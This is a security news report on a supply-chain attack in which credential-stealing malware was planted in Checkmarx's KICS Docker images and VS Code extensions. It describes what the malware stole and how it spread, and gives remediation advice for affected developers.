Checkmarx suffers second compromise within a month, malware found in developer tools

Checkmarx, an application security company that provides developer-focused security testing tools, has suffered a second compromise within a month after attackers injected credential-stealing malware into widely used software distributed through Docker Hub and Visual Studio Code extensions.

The breach affected the company’s KICS tool, short for Keeping Infrastructure as Code Secure, a free utility designed to detect vulnerabilities, misconfigurations, and compliance issues in infrastructure code. Its Docker container has been downloaded more than 5 million times, amplifying the potential impact of the incident.

Malicious code was embedded into official KICS Docker images by replacing existing versions while retaining trusted version tags such as v2.1.20, v2.1.20-debian, alpine, debian, and latest. A new version, v2.1.21, was also introduced with the same compromised functionality. This approach caused developers to unknowingly pull infected versions while expecting previously verified releases.

The attack also extended to Visual Studio Code through compromised extensions, including Checkmarx Developer Assist and Checkmarx AST-Results. These tools are commonly integrated into development workflows, increasing the likelihood of widespread exposure across software development environments.

The altered KICS containers were modified to include data collection and exfiltration capabilities. The malware generates scan reports containing sensitive configuration data, encrypts the information, and transmits it to attacker-controlled servers. Because KICS is used to analyze infrastructure-as-code files that often include credentials, the compromised tool created a pathway for harvesting sensitive data at scale.

The malicious VS Code extensions contained a component identified as “mcpAddon.js,” a multi-stage malware designed to steal credentials and propagate further infections. The component retrieves additional code from a hardcoded GitHub link and executes it without user verification or integrity checks.

The malware is capable of extracting a wide range of sensitive data, including GitHub authentication tokens, AWS credentials, Microsoft Azure tokens, Google Cloud credential databases, npm configuration files, SSH keys, environment variables, and other configuration files tied to development environments. Stolen data is compressed, encrypted, and exfiltrated to external servers as well as attacker-controlled public repositories created under compromised user accounts.

Attackers have used stolen GitHub tokens to inject unauthorized GitHub Actions workflows, enabling further credential harvesting and automated spread of malicious code into repositories and software packages. This propagation mechanism allows the compromise to extend into additional development pipelines and downstream dependencies.

Developers and organizations that downloaded or used the affected tools are advised to treat the incident as both a credential exposure and a CI/CD pipeline compromise. Security measures include rotating all potentially exposed credentials, auditing GitHub repositories for unauthorized changes, reviewing npm packages for tampering, and analyzing cloud access logs for unusual activity.

The campaign has been linked to TeamPCP, a financially motivated threat group that emerged in late 2025. The group has conducted a sustained supply chain attack across multiple platforms, including GitHub, npm, OpenVSX, PyPI, and Docker Hub.